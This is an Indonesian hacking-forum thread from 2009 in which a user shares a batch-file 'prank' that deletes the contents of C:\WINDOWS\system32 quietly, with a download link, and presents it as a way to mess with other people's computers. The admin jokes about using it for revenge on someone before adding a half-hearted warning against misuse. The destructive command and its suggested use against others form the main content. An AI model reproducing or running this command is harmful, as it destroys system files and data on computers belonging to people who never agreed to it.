Cyber-Toerdjo


Welcome To The Cybernet-Toerdjo Team.
 
IndeksCalendarFAQPencarianAnggotaGroupPendaftaranLogin
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Latest topics
» salam kenal semuanya
Thu Sep 12, 2013 8:02 pm by Moon Drop

» Salam kenal ...
Thu Oct 25, 2012 4:40 pm by yudisrey

» Biar Akrab kenalan doloE
Thu Sep 06, 2012 1:28 pm by mr.pego

» security and hack FB
Tue Apr 03, 2012 10:56 pm by rifkigaoll

» Menjebol Password BIOS
Tue Apr 03, 2012 10:52 pm by rifkigaoll

» Sofware untuk menyembunyikan file apapun dalam sebuah media gambar.
Fri Mar 30, 2012 9:15 am by Cyber_Althaf

» Simulasi Pertambahan Carder
Fri Mar 02, 2012 11:02 am by musa55

» hack password facebook
Thu Feb 02, 2012 7:54 pm by lunnaii

» linknya mana
Wed Dec 07, 2011 9:46 pm by dragonov

December 2016
MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 
CalendarCalendar
Link Sponsor
FB
Banner Forum

BriGade




Share | 
 

 jangan pernah di coba di komputer sendiri

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
anak_dumai



Jumlah posting : 24
Reputation : 0
Join date : 02.12.09

PostSubyek: jangan pernah di coba di komputer sendiri   Tue Dec 22, 2009 10:17 pm

Jangan dicoba di computer sendiri ya
sebenernya ne gampank bgt tutornya..
di bikin dari notepad.. n jangan pernah di jalanini di kompi sendiri..
beuh..
ngedelete c:\WINDOWS\system32\*.*/q
kacao..
mayan buat isengin kompi orang.. hahaha
yg pertama extentionnya mesti .bat
truz paz kita ngeklik cmd extention itu,,
dar.. kehapuz smua di windosw itu..
yg dilanjutin.. tinggal instal ulang windows deh..
hahaha!
ywudah..
download ne source nya..
Cool

download linkz
http://www.ziddu.com/download.php?uid=aL...iY66Wlpmn3
Kembali Ke Atas Go down
Lihat profil user
Admin



Jumlah posting : 74
Reputation : 3
Join date : 28.11.09
Age : 36
Lokasi : —¤÷('KuToardjoE')÷¤—

PostSubyek: Re: jangan pernah di coba di komputer sendiri   Wed Dec 23, 2009 3:34 pm

Wedew...jahat banget nech,,,tapi lebih jahat orang yang nyakitin kita harus di balez X ya kalau dia punya kompi/laptop ngakak

Peringatan : Jangan dipakai di kompi sendiri X ya

Thank's sob sharenya yach...

_________________
*6FE801*54AAD48A5B5A3*76B4f81 (pacul)

Kembali Ke Atas Go down
Lihat profil user http://cyber-toerdjo.forumotion.com
anak_dumai



Jumlah posting : 24
Reputation : 0
Join date : 02.12.09

PostSubyek: Re: jangan pernah di coba di komputer sendiri   Wed Dec 23, 2009 3:48 pm

betul...betul......

tapi klu menurrut aku kejahatan tiddak selama nya di balez dgn kejahatan.....
Kembali Ke Atas Go down
Lihat profil user
Admin



Jumlah posting : 74
Reputation : 3
Join date : 28.11.09
Age : 36
Lokasi : —¤÷('KuToardjoE')÷¤—

PostSubyek: Re: jangan pernah di coba di komputer sendiri   Wed Dec 23, 2009 5:07 pm

Yoi sob..betul itu.....jangan digunain untuk kejahatan tapi yach...

_________________
*6FE801*54AAD48A5B5A3*76B4f81 (pacul)

Kembali Ke Atas Go down
Lihat profil user http://cyber-toerdjo.forumotion.com
k0pl4k



Jumlah posting : 5
Reputation : 0
Join date : 08.12.09

PostSubyek: Re: jangan pernah di coba di komputer sendiri   Thu Dec 24, 2009 2:35 pm

OK brotHer thank's ya sharenya......matur nuwun....
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: jangan pernah di coba di komputer sendiri   Today at 11:25 pm

Kembali Ke Atas Go down
 
jangan pernah di coba di komputer sendiri
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Gimana caranya jdi orang yg serius??
» Salah Siapa?
» Asyiknya emang rame2, tapi wajib jangan ditiru...
» ASK cara ganti filter oli sendiri...
» (ask) Bensin dicampur broquet plus octane booster aman gak ya?

Permissions in this forum:Anda tidak dapat menjawab topik
Cyber-Toerdjo :: Miscellaneous :: Malware (Virus, Spyware, Hijack, dll)-
Navigasi: